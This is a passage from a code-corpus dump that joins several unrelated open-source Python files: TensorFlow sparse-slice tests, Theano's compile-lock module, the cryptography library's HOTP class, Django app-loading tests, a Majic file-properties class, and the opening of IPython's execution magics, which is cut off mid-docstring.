# [ | |'e0'| ]
# slice(:,:, 1)
# ['a1'| |'b1'| ]
# [ |'c1'| |'d1']
# [ | |'e1'| ]
ind = np.array([[0, 0, 0], [0, 0, 1], [0, 2, 0], [0, 2, 1], [1, 1, 0],
[1, 1, 1], [1, 3, 0], [1, 3, 1], [2, 2, 0], [2, 2,
1]]).astype(
np.int64)
val = np.array(['a0', 'a1', 'b0', 'b1', 'c0', 'c1', 'd0', 'd1', 'e0', 'e1'])
shape = np.array([3, 4, 2]).astype(np.int64)
return sparse_tensor.SparseTensorValue(ind, val, shape)
def _SparseTensor_3x4x2(self):
return sparse_tensor.SparseTensor.from_value(
self._SparseTensorValue_3x4x2())
@test_util.run_deprecated_v1
def testSliceMatrixRows(self):
with self.session(use_gpu=False):
sp_input = self._SparseTensor_4x6()
sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [2, 6])
sp_tensor1 = sparse_ops.sparse_slice(sp_input, [2, 0], [3, 7])
self.assertAllEqual(
sp_tensor0.indices.eval(),
[[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1, 4]])
self.assertAllEqual(sp_tensor0.values.eval(), [0, 2, 4, 5, 11, 13, 14])
self.assertAllEqual(sp_tensor0.dense_shape.eval(), [2, 6])
self.assertAllEqual(
sp_tensor1.indices.eval(),
[[0, 0], [0, 3], [0, 5], [1, 0], [1, 2], [1, 3], [1, 5]])
self.assertAllEqual(sp_tensor1.values.eval(),
[20, 23, 25, 30, 32, 33, 35])
self.assertAllEqual(sp_tensor1.dense_shape.eval(), [2, 6])
@test_util.run_deprecated_v1
def testSliceMatrixUnevenCols(self):
with self.session(use_gpu=False):
sp_input = self._SparseTensor_5x7()
sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [5, 3])
sp_tensor1 = sparse_ops.sparse_slice(sp_input, [0, 3], [5, 2])
sp_tensor2 = sparse_ops.sparse_slice(sp_input, [0, 5], [5, 2])
self.assertAllEqual(
sp_tensor0.indices.eval(),
[[0, 0], [0, 2], [1, 1], [2, 0], [3, 0], [3, 2], [4, 1]])
self.assertAllEqual(sp_tensor0.values.eval(), [0, 2, 11, 20, 30, 32, 41])
self.assertAllEqual(sp_tensor0.dense_shape.eval(), [5, 3])
self.assertAllEqual(sp_tensor1.indices.eval(),
[[0, 1], [1, 0], [1, 1], [2, 0], [3, 0], [4, 1]])
self.assertAllEqual(sp_tensor1.values.eval(), [4, 13, 14, 23, 33, 44])
self.assertAllEqual(sp_tensor1.dense_shape.eval(), [5, 2])
self.assertAllEqual(sp_tensor2.indices.eval(),
[[0, 0], [1, 1], [2, 0], [3, 0], [4, 1]])
self.assertAllEqual(sp_tensor2.values.eval(), [5, 16, 25, 35, 46])
self.assertAllEqual(sp_tensor2.dense_shape.eval(), [5, 2])
sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [5, 2])
sp_tensor1 = sparse_ops.sparse_slice(sp_input, [0, 2], [5, 2])
sp_tensor2 = sparse_ops.sparse_slice(sp_input, [0, 4], [5, 2])
sp_tensor3 = sparse_ops.sparse_slice(sp_input, [0, 6], [5, 2])
self.assertAllEqual(sp_tensor0.indices.eval(),
[[0, 0], [1, 1], [2, 0], [3, 0], [4, 1]])
self.assertAllEqual(sp_tensor0.values.eval(), [0, 11, 20, 30, 41])
self.assertAllEqual(sp_tensor0.dense_shape.eval(), [5, 2])
self.assertAllEqual(sp_tensor1.indices.eval(),
[[0, 0], [1, 1], [2, 1], [3, 0], [3, 1]])
self.assertAllEqual(sp_tensor1.values.eval(), [2, 13, 23, 32, 33])
self.assertAllEqual(sp_tensor1.dense_shape.eval(), [5, 2])
self.assertAllEqual(sp_tensor2.indices.eval(),
[[0, 0], [0, 1], [1, 0], [2, 1], [3, 1], [4, 0]])
self.assertAllEqual(sp_tensor2.values.eval(), [4, 5, 14, 25, 35, 44])
self.assertAllEqual(sp_tensor2.dense_shape.eval(), [5, 2])
self.assertAllEqual(sp_tensor3.indices.eval(), [[1, 0], [4, 0]])
self.assertAllEqual(sp_tensor3.values.eval(), [16, 46])
self.assertAllEqual(sp_tensor3.dense_shape.eval(), [5, 1])
@test_util.run_deprecated_v1
def testSliceMatrixUnevenRows(self):
with self.session(use_gpu=False):
sp_input = self._SparseTensor_5x7()
sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [3, 7])
sp_tensor1 = sparse_ops.sparse_slice(sp_input, [3, 0], [3, 7])
self.assertAllEqual(sp_tensor0.indices.eval(),
[[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3],
[1, 4], [1, 6], [2, 0], [2, 3], [2, 5]])
self.assertAllEqual(sp_tensor0.values.eval(),
[0, 2, 4, 5, 11, 13, 14, 16, 20, 23, 25])
self.assertAllEqual(sp_tensor0.dense_shape.eval(), [3, 7])
self.assertAllEqual(
sp_tensor1.indices.eval(),
[[0, 0], [0, 2], [0, 3], [0, 5], [1, 1], [1, 4], [1, 6]])
self.assertAllEqual(sp_tensor1.values.eval(),
[30, 32, 33, 35, 41, 44, 46])
self.assertAllEqual(sp_tensor1.dense_shape.eval(), [2, 7])
sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [2, 7])
sp_tensor1 = sparse_ops.sparse_slice(sp_input, [2, 0], [2, 7])
sp_tensor2 = sparse_ops.sparse_slice(sp_input, [4, 0], [2, 7])
self.assertAllEqual(
sp_tensor0.indices.eval(),
[[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1, 4], [1, 6]])
self.assertAllEqual(sp_tensor0.values.eval(),
[0, 2, 4, 5, 11, 13, 14, 16])
self.assertAllEqual(sp_tensor0.dense_shape.eval(), [2, 7])
self.assertAllEqual(sp_tensor1.values.eval(),
[20, 23, 25, 30, 32, 33, 35])
self.assertAllEqual(sp_tensor1.dense_shape.eval(), [2, 7])
self.assertAllEqual(sp_tensor2.indices.eval(), [[0, 1], [0, 4], [0, 6]])
self.assertAllEqual(sp_tensor2.values.eval(), [41, 44, 46])
self.assertAllEqual(sp_tensor2.dense_shape.eval(), [1, 7])
return
@test_util.run_deprecated_v1
def testSliceAllRows(self):
with self.session(use_gpu=False):
sp_input = self._SparseTensor_4x6()
sp_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [1, 6])
sp_tensor1 = sparse_ops.sparse_slice(sp_input, [1, 0], [1, 6])
sp_tensor2 = sparse_ops.sparse_slice(sp_input, [2, 0], [1, 7])
sp_tensor3 = sparse_ops.sparse_slice(sp_input, [3, 0], [2, 7])
self.assertAllEqual(sp_tensor0.indices.eval(),
[[0, 0], [0, 2], [0, 4], [0, 5]])
self.assertAllEqual(sp_tensor0.values.eval(), [0, 2, 4, 5])
self.assertAllEqual(sp_tensor0.dense_shape.eval(), [1, 6])
self.assertAllEqual(sp_tensor1.indices.eval(), [[0, 1], [0, 3], [0, 4]])
self.assertAllEqual(sp_tensor1.values.eval(), [11, 13, 14])
self.assertAllEqual(sp_tensor1.dense_shape.eval(), [1, 6])
self.assertAllEqual(sp_tensor2.indices.eval(), [[0, 0], [0, 3], [0, 5]])
self.assertAllEqual(sp_tensor2.values.eval(), [20, 23, 25])
self.assertAllEqual(sp_tensor2.dense_shape.eval(), [1, 6])
self.assertAllEqual(sp_tensor3.indices.eval(),
[[0, 0], [0, 2], [0, 3], [0, 5]])
self.assertAllEqual(sp_tensor3.values.eval(), [30, 32, 33, 35])
self.assertAllEqual(sp_tensor3.dense_shape.eval(), [1, 6])
@test_util.run_deprecated_v1
def testSliceColumns(self):
with self.session(use_gpu=False):
sp_input = self._SparseTensor_4x6()
sparse_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [4, 2])
sparse_tensor1 = sparse_ops.sparse_slice(sp_input, [0, 2], [5, 2])
sparse_tensor2 = sparse_ops.sparse_slice(sp_input, [0, 4], [5, 3])
self.assertAllEqual(sparse_tensor0.indices.eval(),
[[0, 0], [1, 1], [2, 0], [3, 0]])
self.assertAllEqual(sparse_tensor0.values.eval(), [0, 11, 20, 30])
self.assertAllEqual(sparse_tensor0.dense_shape.eval(), [4, 2])
self.assertAllEqual(sparse_tensor1.indices.eval(),
[[0, 0], [1, 1], [2, 1], [3, 0], [3, 1]])
self.assertAllEqual(sparse_tensor1.values.eval(), [2, 13, 23, 32, 33])
self.assertAllEqual(sparse_tensor1.dense_shape.eval(), [4, 2])
self.assertAllEqual(sparse_tensor2.indices.eval(),
[[0, 0], [0, 1], [1, 0], [2, 1], [3, 1]])
self.assertAllEqual(sparse_tensor2.values.eval(), [4, 5, 14, 25, 35])
self.assertAllEqual(sparse_tensor2.dense_shape.eval(), [4, 2])
@test_util.run_deprecated_v1
def testSliceAllColumns(self):
with self.session(use_gpu=False):
sp_input = self._SparseTensor_4x6()
sparse_tensor0 = sparse_ops.sparse_slice(sp_input, [0, 0], [4, 1])
sparse_tensor1 = sparse_ops.sparse_slice(sp_input, [0, 1], [4, 1])
sparse_tensor2 = sparse_ops.sparse_slice(sp_input, [0, 2], [4, 1])
sparse_tensor3 = sparse_ops.sparse_slice(sp_input, [0, 3], [4, 1])
sparse_tensor4 = sparse_ops.sparse_slice(sp_input, [0, 4], [5, 1])
sparse_tensor5 = sparse_ops.sparse_slice(sp_input, [0, 5], [6, 3])
self.assertAllEqual(sparse_tensor0.indices.eval(),
[[0, 0], [2, 0], [3, 0]])
self.assertAllEqual(sparse_tensor0.values.eval(), [0, 20, 30])
self.assertAllEqual(sparse_tensor0.dense_shape.eval(), [4, 1])
self.assertAllEqual(sparse_tensor1.indices.eval(), [[1, 0]])
self.assertAllEqual(sparse_tensor1.values.eval(), [11])
self.assertAllEqual(sparse_tensor1.dense_shape.eval(), [4, 1])
self.assertAllEqual(sparse_tensor2.indices.eval(), [[0, 0], [3, 0]])
self.assertAllEqual(sparse_tensor2.values.eval(), [2, 32])
self.assertAllEqual(sparse_tensor2.dense_shape.eval(), [4, 1])
self.assertAllEqual(sparse_tensor3.indices.eval(),
[[1, 0], [2, 0], [3, 0]])
self.assertAllEqual(sparse_tensor3.dense_shape.eval(), [4, 1])
self.assertAllEqual(sparse_tensor3.values.eval(), [13, 23, 33])
self.assertAllEqual(sparse_tensor4.indices.eval(), [[0, 0], [1, 0]])
self.assertAllEqual(sparse_tensor4.values.eval(), [4, 14])
self.assertAllEqual(sparse_tensor4.dense_shape.eval(), [4, 1])
self.assertAllEqual(sparse_tensor5.indices.eval(),
[[0, 0], [2, 0], [3, 0]])
self.assertAllEqual(sparse_tensor5.values.eval(), [5, 25, 35])
self.assertAllEqual(sparse_tensor5.dense_shape.eval(), [4, 1])
@test_util.run_deprecated_v1
def testGradients(self):
sp_input = self._SparseTensor_4x6(val_dtype=np.float32)
start_and_size = [([0, 0], [4, 2]),
([0, 2], [5, 2]),
([0, 4], [5, 3])]
with self.session(use_gpu=False):
for start, size in start_and_size:
sp_output = sparse_ops.sparse_slice(sp_input, start, size)
nnz_in = len(sp_input.values.eval())
nnz_out = len(sp_output.values.eval())
err = gradient_checker.compute_gradient_error(
[sp_input.values], [(nnz_in,)], sp_output.values, (nnz_out,))
self.assertLess(err, 1e-3)
if __name__ == '__main__':
test.main()
| apache-2.0 |
JazzeYoung/VeryDeepAutoEncoder | theano/gof/compilelock.py | 2 | 14196 | # Locking mechanism to ensure no two compilations occur simultaneously
# in the same compilation directory (which can cause crashes).
from __future__ import absolute_import, print_function, division
import atexit
import os
import socket # only used for gethostname()
import time
import logging
from contextlib import contextmanager
import numpy as np
from theano import config
random = np.random.RandomState([2015, 8, 2])
_logger = logging.getLogger("theano.gof.compilelock")
# If the user provided a logging level, we don't want to override it.
if _logger.level == logging.NOTSET:
# INFO will show the "Refreshing lock" messages
_logger.setLevel(logging.INFO)
hostname = socket.gethostname()
def force_unlock():
"""
Delete the compilation lock if someone else has it.
"""
get_lock(min_wait=0, max_wait=0.001, timeout=0)
release_lock()
@contextmanager
def lock_ctx(lock_dir=None, keep_lock=False, **kw):
get_lock(lock_dir=lock_dir, **kw)
yield
if not keep_lock:
release_lock()
# We define this name with an underscore so that python shutdown
# deletes this before non-underscore names (like os). We need to do
# it this way to avoid errors on shutdown.
def _get_lock(lock_dir=None, **kw):
"""
Obtain lock on compilation directory.
Parameters
----------
kw
Additional arguments to be forwarded to the `lock` function when
acquiring the lock.
Notes
-----
We can lock only on 1 directory at a time.
"""
if lock_dir is None:
lock_dir = os.path.join(config.compiledir, 'lock_dir')
if not hasattr(get_lock, 'n_lock'):
# Initialization.
get_lock.n_lock = 0
if not hasattr(get_lock, 'lock_is_enabled'):
# Enable lock by default.
get_lock.lock_is_enabled = True
get_lock.lock_dir = lock_dir
get_lock.unlocker = Unlocker(get_lock.lock_dir)
else:
if lock_dir != get_lock.lock_dir:
# Compilation directory has changed.
# First ensure all old locks were released.
assert get_lock.n_lock == 0
# Update members for new compilation directory.
get_lock.lock_dir = lock_dir
get_lock.unlocker = Unlocker(get_lock.lock_dir)
if get_lock.lock_is_enabled:
# Only really try to acquire the lock if we do not have it already.
if get_lock.n_lock == 0:
lock(get_lock.lock_dir, **kw)
atexit.register(Unlocker.unlock, get_lock.unlocker)
# Store time at which the lock was set.
get_lock.start_time = time.time()
else:
# Check whether we need to 'refresh' the lock. We do this
# every 'config.compile.timeout / 2' seconds to ensure
# no one else tries to override our lock after their
# 'config.compile.timeout' timeout period.
if get_lock.start_time is None:
# This should not happen. So if this happen, clean up
# the lock state and raise an error.
while get_lock.n_lock > 0:
release_lock()
raise Exception("For some unknow reason, the lock was already "
"taken, but no start time was registered.")
now = time.time()
if now - get_lock.start_time > config.compile.timeout / 2:
lockpath = os.path.join(get_lock.lock_dir, 'lock')
_logger.info('Refreshing lock %s', str(lockpath))
refresh_lock(lockpath)
get_lock.start_time = now
get_lock.n_lock += 1
get_lock = _get_lock
def release_lock():
"""
Release lock on compilation directory.
"""
get_lock.n_lock -= 1
assert get_lock.n_lock >= 0
# Only really release lock once all lock requests have ended.
if get_lock.lock_is_enabled and get_lock.n_lock == 0:
get_lock.start_time = None
get_lock.unlocker.unlock(force=False)
def set_lock_status(use_lock):
"""
Enable or disable the lock on the compilation directory (which is enabled
by default). Disabling may make compilation slightly faster (but is not
recommended for parallel execution).
Parameters
----------
use_lock : bool
Whether to use the compilation lock or not.
"""
get_lock.lock_is_enabled = use_lock
# This is because None is a valid input for timeout
notset = object()
def lock(tmp_dir, timeout=notset, min_wait=None, max_wait=None, verbosity=1):
"""
Obtain lock access by creating a given temporary directory (whose base will
be created if needed, but will not be deleted after the lock is removed).
If access is refused by the same lock owner during more than 'timeout'
seconds, then the current lock is overridden. If timeout is None, then no
timeout is performed.
The lock is performed by creating a 'lock' file in 'tmp_dir' that contains
a unique id identifying the owner of the lock (the process id, followed by
a random string).
When there is already a lock, the process sleeps for a random amount of
time between min_wait and max_wait seconds before trying again.
If 'verbosity' is >= 1, then a message will be displayed when we need to
wait for the lock. If it is set to a value >1, then this message will be
displayed each time we re-check for the presence of the lock. Otherwise it
is displayed only when we notice the lock's owner has changed.
Parameters
----------
tmp_dir : str
Lock directory that will be created when acquiring the lock.
timeout : int or None
Time (in seconds) to wait before replacing an existing lock (default
config 'compile.timeout').
min_wait: int
Minimum time (in seconds) to wait before trying again to get the lock
(default config 'compile.wait').
max_wait: int
Maximum time (in seconds) to wait before trying again to get the lock
(default 2 * min_wait).
verbosity : int
Amount of feedback displayed to screen (default 1).
"""
if min_wait is None:
min_wait = config.compile.wait
if max_wait is None:
max_wait = min_wait * 2
if timeout is notset:
timeout = config.compile.timeout
# Create base of lock directory if required.
base_lock = os.path.dirname(tmp_dir)
if not os.path.isdir(base_lock):
try:
os.makedirs(base_lock)
except OSError:
# Someone else was probably trying to create it at the same time.
# We wait two seconds just to make sure the following assert does
# not fail on some NFS systems.
time.sleep(2)
assert os.path.isdir(base_lock)
# Variable initialization.
lock_file = os.path.join(tmp_dir, 'lock')
my_pid = os.getpid()
no_display = (verbosity == 0)
nb_error = 0
# The number of time we sleep when their is no errors.
# Used to don't display it the first time to display it less frequently.
# And so don't get as much email about this!
nb_wait = 0
# Acquire lock.
while True:
try:
last_owner = 'no_owner'
time_start = time.time()
other_dead = False
while os.path.isdir(tmp_dir):
try:
with open(lock_file) as f:
read_owner = f.readlines()[0].strip()
# The try is transition code for old locks.
# It may be removed when people have upgraded.
try:
other_host = read_owner.split('_')[2]
except IndexError:
other_host = () # make sure it isn't equal to any host
if other_host == hostname:
try:
# Just check if the other process still exist.
os.kill(int(read_owner.split('_')[0]), 0)
except OSError:
other_dead = True
except AttributeError:
pass # os.kill does not exist on windows
except Exception:
read_owner = 'failure'
if other_dead:
if not no_display:
msg = "process '%s'" % read_owner.split('_')[0]
_logger.warning("Overriding existing lock by dead %s "
"(I am process '%s')", msg, my_pid)
get_lock.unlocker.unlock(force=True)
continue
if last_owner == read_owner:
if (timeout is not None and
time.time() - time_start >= timeout):
# Timeout exceeded or locking process dead.
if not no_display:
if read_owner == 'failure':
msg = 'unknown process'
else:
msg = "process '%s'" % read_owner.split('_')[0]
_logger.warning("Overriding existing lock by %s "
"(I am process '%s')", msg, my_pid)
get_lock.unlocker.unlock(force=True)
continue
else:
last_owner = read_owner
time_start = time.time()
no_display = (verbosity == 0)
if not no_display and nb_wait > 0:
if read_owner == 'failure':
msg = 'unknown process'
else:
msg = "process '%s'" % read_owner.split('_')[0]
_logger.info("Waiting for existing lock by %s (I am "
"process '%s')", msg, my_pid)
_logger.info("To manually release the lock, delete %s",
tmp_dir)
if verbosity <= 1:
no_display = True
nb_wait += 1
time.sleep(random.uniform(min_wait, max_wait))
try:
os.mkdir(tmp_dir)
except OSError:
# Error while creating the directory: someone else
# must have tried at the exact same time.
nb_error += 1
if nb_error < 10:
continue
else:
raise
# Safety check: the directory should be here.
assert os.path.isdir(tmp_dir)
# Write own id into lock file.
unique_id = refresh_lock(lock_file)
# Verify we are really the lock owner (this should not be needed,
# but better be safe than sorry).
with open(lock_file) as f:
owner = f.readlines()[0].strip()
if owner != unique_id:
# Too bad, try again.
continue
else:
# We got the lock, hoorray!
return
except Exception as e:
# If something wrong happened, we try again.
_logger.warning("Something wrong happened: %s %s", type(e), e)
nb_error += 1
if nb_error > 10:
raise
time.sleep(random.uniform(min_wait, max_wait))
continue
def refresh_lock(lock_file):
"""
'Refresh' an existing lock by re-writing the file containing the owner's
unique id, using a new (randomly generated) id, which is also returned.
"""
unique_id = '%s_%s_%s' % (
os.getpid(),
''.join([str(random.randint(0, 9)) for i in range(10)]),
hostname)
try:
with open(lock_file, 'w') as lock_write:
lock_write.write(unique_id + '\n')
except Exception:
# In some strange case, this happen. To prevent all tests
# from failing, we release the lock, but as there is a
# problem, we still keep the original exception.
# This way, only 1 test would fail.
while get_lock.n_lock > 0:
release_lock()
_logger.warn('Refreshing lock failed, we release the'
' lock before raising again the exception')
raise
return unique_id
class Unlocker(object):
"""
Class wrapper around release mechanism so that the lock is automatically
released when the program exits (even when crashing or being interrupted),
using the __del__ class method.
"""
def __init__(self, tmp_dir):
self.tmp_dir = tmp_dir
def unlock(self, force=False):
"""
Remove current lock.
This function does not crash if it is unable to properly
delete the lock file and directory. The reason is that it
should be allowed for multiple jobs running in parallel to
unlock the same directory at the same time (e.g. when reaching
their timeout limit).
"""
# If any error occurs, we assume this is because someone else tried to
# unlock this directory at the same time.
# Note that it is important not to have both remove statements within
# the same try/except block. The reason is that while the attempt to
# remove the file may fail (e.g. because for some reason this file does
# not exist), we still want to try and remove the directory.
# Check if someone else didn't took our lock.
lock_file = os.path.join(self.tmp_dir, 'lock')
if not force:
try:
with open(lock_file) as f:
owner = f.readlines()[0].strip()
pid, _, hname = owner.split('_')
if pid != str(os.getpid()) or hname != hostname:
return
except Exception:
pass
try:
os.remove(lock_file)
except Exception:
pass
try:
os.rmdir(self.tmp_dir)
except Exception:
pass
| bsd-3-clause |
zlsun/XX-Net | code/default/python27/1.0/lib/win32/cryptography/hazmat/primitives/twofactor/hotp.py | 32 | 2516 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import struct
import six
from cryptography.exceptions import (
UnsupportedAlgorithm, _Reasons
)
from cryptography.hazmat.backends.interfaces import HMACBackend
from cryptography.hazmat.primitives import constant_time, hmac
from cryptography.hazmat.primitives.hashes import SHA1, SHA256, SHA512
from cryptography.hazmat.primitives.twofactor import InvalidToken
from cryptography.hazmat.primitives.twofactor.utils import _generate_uri
class HOTP(object):
def __init__(self, key, length, algorithm, backend):
if not isinstance(backend, HMACBackend):
raise UnsupportedAlgorithm(
"Backend object does not implement HMACBackend.",
_Reasons.BACKEND_MISSING_INTERFACE
)
if len(key) < 16:
raise ValueError("Key length has to be at least 128 bits.")
if not isinstance(length, six.integer_types):
raise TypeError("Length parameter must be an integer type.")
if length < 6 or length > 8:
raise ValueError("Length of HOTP has to be between 6 to 8.")
if not isinstance(algorithm, (SHA1, SHA256, SHA512)):
raise TypeError("Algorithm must be SHA1, SHA256 or SHA512.")
self._key = key
self._length = length
self._algorithm = algorithm
self._backend = backend
def generate(self, counter):
truncated_value = self._dynamic_truncate(counter)
hotp = truncated_value % (10 ** self._length)
return "{0:0{1}}".format(hotp, self._length).encode()
def verify(self, hotp, counter):
if not constant_time.bytes_eq(self.generate(counter), hotp):
raise InvalidToken("Supplied HOTP value does not match.")
def _dynamic_truncate(self, counter):
ctx = hmac.HMAC(self._key, self._algorithm, self._backend)
ctx.update(struct.pack(">Q", counter))
hmac_value = ctx.finalize()
offset = six.indexbytes(hmac_value, len(hmac_value) - 1) & 0b1111
p = hmac_value[offset:offset + 4]
return struct.unpack(">I", p)[0] & 0x7fffffff
def get_provisioning_uri(self, account_name, counter, issuer):
return _generate_uri(self, "hotp", account_name, issuer, [
("counter", int(counter)),
])
| bsd-2-clause |
yangming85/lettuce | tests/integration/lib/Django-1.3/tests/regressiontests/app_loading/tests.py | 48 | 3019 | import copy
import os
import sys
import time
from django.conf import Settings
from django.db.models.loading import cache, load_app
from django.utils.unittest import TestCase
class InstalledAppsGlobbingTest(TestCase):
def setUp(self):
self.OLD_SYS_PATH = sys.path[:]
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
self.OLD_TZ = os.environ.get("TZ")
def test_globbing(self):
settings = Settings('test_settings')
self.assertEqual(settings.INSTALLED_APPS, ['parent.app', 'parent.app1', 'parent.app_2'])
def tearDown(self):
sys.path = self.OLD_SYS_PATH
if hasattr(time, "tzset") and self.OLD_TZ:
os.environ["TZ"] = self.OLD_TZ
time.tzset()
class EggLoadingTest(TestCase):
def setUp(self):
self.old_path = sys.path[:]
self.egg_dir = '%s/eggs' % os.path.dirname(__file__)
# This test adds dummy applications to the app cache. These
# need to be removed in order to prevent bad interactions
# with the flush operation in other tests.
self.old_app_models = copy.deepcopy(cache.app_models)
self.old_app_store = copy.deepcopy(cache.app_store)
def tearDown(self):
sys.path = self.old_path
cache.app_models = self.old_app_models
cache.app_store = self.old_app_store
def test_egg1(self):
"""Models module can be loaded from an app in an egg"""
egg_name = '%s/modelapp.egg' % self.egg_dir
sys.path.append(egg_name)
models = load_app('app_with_models')
self.assertFalse(models is None)
def test_egg2(self):
"""Loading an app from an egg that has no models returns no models (and no error)"""
egg_name = '%s/nomodelapp.egg' % self.egg_dir
sys.path.append(egg_name)
models = load_app('app_no_models')
self.assertTrue(models is None)
def test_egg3(self):
"""Models module can be loaded from an app located under an egg's top-level package"""
egg_name = '%s/omelet.egg' % self.egg_dir
sys.path.append(egg_name)
models = load_app('omelet.app_with_models')
self.assertFalse(models is None)
def test_egg4(self):
"""Loading an app with no models from under the top-level egg package generates no error"""
egg_name = '%s/omelet.egg' % self.egg_dir
sys.path.append(egg_name)
models = load_app('omelet.app_no_models')
self.assertTrue(models is None)
def test_egg5(self):
"""Loading an app from an egg that has an import error in its models module raises that error"""
egg_name = '%s/brokenapp.egg' % self.egg_dir
sys.path.append(egg_name)
self.assertRaises(ImportError, load_app, 'broken_app')
try:
load_app('broken_app')
except ImportError, e:
# Make sure the message is indicating the actual
# problem in the broken app.
self.assertTrue("modelz" in e.args[0])
| gpl-3.0 |
NERC-CEH/jules-jasmin | groupworkspace_sync/sync/file_properties.py | 1 | 2448 | """
# Majic
# Copyright (C) 2015 CEH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
class FileProperties(object):
"""
Important properties of a file needing to be synchronised
"""
def __init__(self, file_path, owner, is_published, is_public):
"""
constructor
:param file_path: path to the file relative to the root
:param owner: userid of the user who owns the file
:param is_published: True if the file is published, false otherwise (i.e. readable by majic users)
:param is_public: True if the file is public, false otherwise (i.e. readable by everyone)
"""
self.file_path = file_path
self.owner = owner
self.is_published = is_published
self.is_public = is_public
def __repr__(self):
return "{} (model_owner:{}, published?:{}, public?:{})"\
.format(self.file_path, self.owner, self.is_published, self.is_public)
def __cmp__(self, other):
"""
Compare two File properties
Order is filepath, model_owner, is_publoshed, is_publis
:param other: other File Property to compare
:return: negative integer if self < other, zero if self == other, a positive integer if self > other
"""
if self.file_path != other.file_path:
if self.file_path < other.file_path:
return -1
else:
return 1
if self.owner != other.owner:
if self.owner < other.owner:
return -1
else:
return 1
result = self.is_published.__cmp__(other.is_published)
if result == 0:
result = self.is_public.__cmp__(other.is_public)
return result | gpl-2.0 |
Edu-Glez/Bank_sentiment_analysis | env/lib/python3.6/site-packages/IPython/core/magics/execution.py | 6 | 52758 | # -*- coding: utf-8 -*-
"""Implementation of execution-related magic functions."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
from __future__ import absolute_import
import ast
import bdb
import gc
import itertools
import os
import sys
import time
import timeit
from pdb import Restart
# cProfile was added in Python2.5
try:
import cProfile as profile
import pstats
except ImportError:
# profile isn't bundled by default in Debian for license reasons
try:
import profile, pstats
except ImportError:
profile = pstats = None
from IPython.core import oinspect
from IPython.core import magic_arguments
from IPython.core import page
from IPython.core.error import UsageError
from IPython.core.macro import Macro
from IPython.core.magic import (Magics, magics_class, line_magic, cell_magic,
line_cell_magic, on_off, needs_local_scope)
from IPython.testing.skipdoctest import skip_doctest
from IPython.utils import py3compat
from IPython.utils.py3compat import builtin_mod, iteritems, PY3
from IPython.utils.contexts import preserve_keys
from IPython.utils.capture import capture_output
from IPython.utils.ipstruct import Struct
from IPython.utils.module_paths import find_mod
from IPython.utils.path import get_py_filename, shellglob
from IPython.utils.timing import clock, clock2
from warnings import warn
from logging import error
if PY3:
from io import StringIO
else:
from StringIO import StringIO
#-----------------------------------------------------------------------------
# Magic implementation classes
#-----------------------------------------------------------------------------
class TimeitResult(object):
"""
Object returned by the timeit magic with info about the run.
Contains the following attributes :
loops: (int) number of loops done per measurement
repeat: (int) number of times the measurement has been repeated
best: (float) best execution time / number
all_runs: (list of float) execution time of each run (in s)
compile_time: (float) time of statement compilation (s)
"""
def __init__(self, loops, repeat, best, worst, all_runs, compile_time, precision):
self.loops = loops
self.repeat = repeat
self.best = best
self.worst = worst
self.all_runs = all_runs
self.compile_time = compile_time
self._precision = precision
def _repr_pretty_(self, p , cycle):
if self.loops == 1: # No s at "loops" if only one loop
unic = u"%d loop, best of %d: %s per loop" % (self.loops, self.repeat,
_format_time(self.best, self._precision))
else:
unic = u"%d loops, best of %d: %s per loop" % (self.loops, self.repeat,
_format_time(self.best, self._precision))
p.text(u'<TimeitResult : '+unic+u'>')
class TimeitTemplateFiller(ast.NodeTransformer):
"""Fill in the AST template for timing execution.
This is quite closely tied to the template definition, which is in
:meth:`ExecutionMagics.timeit`.
"""
def __init__(self, ast_setup, ast_stmt):
self.ast_setup = ast_setup
self.ast_stmt = ast_stmt
def visit_FunctionDef(self, node):
"Fill in the setup statement"
self.generic_visit(node)
if node.name == "inner":
node.body[:1] = self.ast_setup.body
return node
def visit_For(self, node):
"Fill in the statement to be timed"
if getattr(getattr(node.body[0], 'value', None), 'id', None) == 'stmt':
node.body = self.ast_stmt.body
return node
class Timer(timeit.Timer):
"""Timer class that explicitly uses self.inner
which is an undocumented implementation detail of CPython,
not shared by PyPy.
"""
# Timer.timeit copied from CPython 3.4.2
def timeit(self, number=timeit.default_number):
"""Time 'number' executions of the main statement.
To be precise, this executes the setup statement once, and
then returns the time it takes to execute the main statement
a number of times, as a float measured in seconds. The
argument is the number of times through the loop, defaulting
to one million. The main statement, the setup statement and
the timer function to be used are passed to the constructor.
"""
it = itertools.repeat(None, number)
gcold = gc.isenabled()
gc.disable()
try:
timing = self.inner(it, self.timer)
finally:
if gcold:
gc.enable()
return timing
@magics_class
class ExecutionMagics(Magics):
"""Magics related to code execution, debugging, profiling, etc.
"""
def __init__(self, shell):
super(ExecutionMagics, self).__init__(shell)
if profile is None:
self.prun = self.profile_missing_notice
# Default execution function used to actually run user code.
self.default_runner = None
def profile_missing_notice(self, *args, **kwargs):
error("""\
The profile module could not be found. It has been removed from the standard
python packages because of its non-free license. To use profiling, install the
python-profiler package from non-free.""")
@skip_doctest
@line_cell_magic
def prun(self, parameter_s='', cell=None):
"""Run a statement through the python code profiler.
Usage, in line mode:
%prun [options] statement
Usage, in cell mode:
%%prun [options] [statement]
code...
code...
In cell mode, the additional code lines are appended to the (possibly
